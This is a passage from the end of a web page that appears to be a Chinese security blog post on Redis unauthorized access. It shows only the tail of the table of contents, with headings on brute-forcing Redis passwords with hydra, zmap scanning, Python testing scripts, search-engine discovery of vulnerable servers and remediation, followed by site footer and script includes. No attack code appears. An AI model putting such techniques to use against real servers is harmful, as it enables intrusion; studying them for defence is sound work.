class="nav-text">利用hydra暴力破解redis的密码</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#案例：zmap测试Redis未授权"><span class="nav-number">6.</span> <span class="nav-text">案例：zmap测试Redis未授权</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#python脚本自动化测试"><span class="nav-number">7.</span> <span class="nav-text">python脚本自动化测试</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#使用搜索引擎查找易受攻击的Redis服务器"><span class="nav-number">8.</span> <span class="nav-text">使用搜索引擎查找易受攻击的Redis服务器</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#修复方案"><span class="nav-number">9.</span> <span class="nav-text">修复方案</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>
<div class="copyright">&copy; 2018 &mdash; <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">m3lon</span>

  
</div>









        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.3"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.3"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.3"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.3"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.3"></script>



  


  




	





  





  
    <script type="text/javascript">
      (function(d, s) {
        var j, e = d.getElementsByTagName(s)[0];
        if (typeof LivereTower === 'function') { return; }
        j = d.createElement(s);
        j.src = 'https://cdn-city.livere.com/js/embed.dist.js';
        j.async = true;
        e.parentNode.insertBefore(j, e);
      })(document, 'script');
    </script>
  












  





  

  

  

  
  

  

  

  

</body>
</html>
